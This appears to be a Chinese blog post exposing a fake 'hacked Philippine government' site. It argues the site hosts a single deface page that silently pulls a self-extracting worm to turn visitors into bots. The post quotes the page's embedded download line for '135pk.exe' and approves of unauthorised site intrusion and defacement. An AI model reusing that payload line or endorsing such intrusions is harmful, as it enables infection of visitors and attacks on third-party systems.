菲律宾事件后,网络上闹的沸沸扬扬,当然有一些爱国青年,无论所谓红客,黑阔,只能说做信息安全的,还是做了一定的反击,当然也攻破了部分菲律宾政府的某些网站,当然一想起传说中的菲律宾政府被攻破,如果安全圈里的基友们,第一个能想起的估计是"小A"了,也不知道这家伙到底哪里高就去,哈哈,一年联系不上他了,莫非被和谐了??(好了主题不跑偏说正事)
当红阔,黑阔攻破菲律宾政府网站的同时嘛,淫家虽然安全不到位,但是发现一定会被改回的,圈内如果参与过"伊朗网军"反击战事件的盆友们,应该很了解,攻破,篡改,改回,再篡改的过程,技术领域虽然菲律宾政府技术不到位,但是管理人员改回的能力还是有的,之后很多人就要问,最近经常看到www.pei.net.ph 这个自称攻破菲律宾政府网站为什么迟迟没有改回呢?而且大肆宣传呢?其实很多技术圈的人都明白这道理,不过对于不知道网络技术的人,就过度的膜拜了,还以为真正遇到传说中的大神,管理员都改不回来?呵呵,很简单,这只是一个炒作的自慰站!
有技术的大牛黑站,挂黑页走人,留名就好,没技术的,只能想想办法,用别的来炒作炒作,当然炒作也要有利益的,要么是名义上的利益,要么就是实际性的利益.当然介绍这个的时候,我们可以整体分析一下对于这个站的基本思路,首先net.ph域名为菲律宾国家域名没错,但是其注册只需要有一个可以开海外接口的IDC就可以注册,当然你也可以选择去狗爹注册,国内无法查询whois 但是国外接口可以,查询whois信息,时间有心的自己查吧,今年的米,呵呵,
分析数据一.
菲律宾国家米持有有三种,一种是 .PH 之后是org.PH 最后就是我们看到的net.PH米.(当然政府网关的GOV.PH不放在内),我们分析一下网关地址.可以查询到网关为: lamitan.gov.ph ,好吧,虽然IP地址是菲律宾的,但是网关地址是美国的,呵呵,这一点我想我们已经可以说明一些简明的问题了,四月份的米,注册的是菲律宾通用域名,继续看下一条!
分析数据二.
对整站渗透了一次,除了根目录的HTML文件,没有其它任何文件痕迹,也就是说这个站点上只有这一个黑页,要知道真正有技术的任意一个技术圈的,都是不删除数据,只挂黑页走人的,哪怕对方多过分,这是我们自认为还算圈内自觉的东西,但是这里只有一个HTML页面,其它的图片信息都是从懒人图库调用过来的,当然这里有闪亮的一点,在文件里 有这样的 一条链接www.jb51.net <PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"> 本人也算是VB蠕虫出身,看到这里不用多说,exe自解压,呵呵,让我联想到各种远控.,呵呵,自解压,自发性,350k 蠕虫病毒, 说句实话,技术有够烂的,蠕虫这么大,如果网速卡点的,还得卡半天,正常蠕虫如果技术好点的,做上免杀也应该在60K左右,
分析数据三
查看文件第15行<PARAM NAME="URL" VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3"> 之后再查看204行<EMBED src=http://www.7jz8.com/12.mp3 hidden=true type=audio/x-ms-wma LOOP="true" AUTOSTART="true"></EMBED> 我们发现他写了两段的音乐播放代码,也就是说,这个人连基本的HTML语音都没学明白,一定在网上下载的现成的黑页模板,之后就挂上去的,当然后面的这句是作废的,是没有用的,
分析数据四
谷歌搜索,国外的网站如果年头久的话都是有GG收录的,你可以site:www.pei.net.ph 一下,呵呵,答案是没收录,
好吧,总结一下,有人故意做了这样一个挂着自解压病毒的黑页独立页面网站,以黑了菲律宾政府网站为由,用着随意人就可以注册的域名架设了这样的一个站,用以何为?大肆宣传有多少人中了这135pk?肆意宣传只是为了更多人的访问,多一个访问就能多抓一只肉鸡,很多人不理解为什么杀软没报毒,如果你现在换成卡巴斯基去查毒,你看能不能查到DIE的蠕虫病毒,菲律宾政府网站为gov.ph 米,跟中国的gov.cn 异曲同工, .PH域名国外接口注册80元每年, 独立IP VPS,低配1G 正常市场价格在60 -100元/月,但是换来的肉鸡是多少?每天有多少人来点击这个网站,成为获益的肉鸡呢?
不管谁是这个幕后的Jason.Mr.X ,收敛点吧,别拿着你自慰的站点坑害国人,呵呵,没品没德没技术你也只能搞这点小动作了!
飞了宾的破逼网站被黑了是该高兴,但是也要看看什么目的是黑站的,对于这样的人,我们只能以唾骂来形容不耻行为,好自为之吧!孩子!
By : Quu
